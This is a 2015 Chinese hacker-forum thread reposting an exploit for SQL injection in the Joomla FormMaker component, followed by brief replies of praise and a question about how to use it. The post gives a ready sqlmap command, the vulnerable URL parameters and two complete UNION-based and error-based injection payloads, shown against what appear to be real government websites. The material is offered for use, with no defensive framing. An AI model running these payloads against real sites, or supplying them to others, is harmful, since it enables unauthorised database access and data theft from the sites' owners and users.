90_ 发表于 2015-3-29 18:02:33

Joomla FormMaker组件注入漏洞

使用说明:
python sqlmap.py -u "http://localhost/index.php?option=com_formmaker&view=formmaker&id=-5653&Itemid=45" --dbs

######################################################################
# Exploit Title: Joomla FormMaker Component - SQL Injection Vulnerability
# Google Dork: Y0ur Brain
# Date: 28.03.2015
# Exploit Author: CrashBandicot (@DosPerl)
# Vendor HomePage: http://extensions.joomla.org/extension/form-maker
# Tested on: Windows
######################################################################
 
 
# Exploit : index.php?option=com_formmaker&view=formmaker&id=-5653 {SQLi}&Itemid=45
#           index.php?option=com_formmaker&task=paypal_info&tmpl=component&id=-1 {SQLi}
 
 
# ~ Demo ~ # $>
 
# Example :
# Type: MySQL UNION query (NULL) - with 28 columns
# URI: http://www.cabinet.gov.zm/index.php?option=com_formmaker&view=formmaker&id=-5653 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170707671,IFNULL(CAST(database() AS CHAR),0x20),0x71767a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&Itemid=45
 
# Other Example :
# Type: error-based
# URI: http://www.ppsppa.gov.my/index.php/ms/?option=com_formmaker&view=formmaker&id=1 AND (SELECT 4784 FROM(SELECT COUNT(*),CONCAT(0x7170767671,(MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x71706b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&Itemid=837
 
 
 
# sh00t5 To SQL_master :D

秋神 发表于 2015-3-30 13:18:58

如何使用呢

初九、 发表于 2015-3-30 15:05:25

看看 学习

ljy07 发表于 2015-6-28 01:04:23

还是不错的哦,顶了

wanmznh 发表于 2015-6-28 15:08:24

支持中国红客联盟(ihonker.org)

云游者 发表于 2015-6-28 15:26:50

xiaoqqf4 发表于 2015-6-29 05:08:03

54hacker 发表于 2015-6-29 06:27:32

支持中国红客联盟(ihonker.org)

a136 发表于 2015-6-29 19:02:57

还是不错的哦,顶了

ruguoruo 发表于 2015-6-30 00:25:49

支持中国红客联盟(ihonker.org)
页: [1]
查看完整版本: Joomla FormMaker组件注入漏洞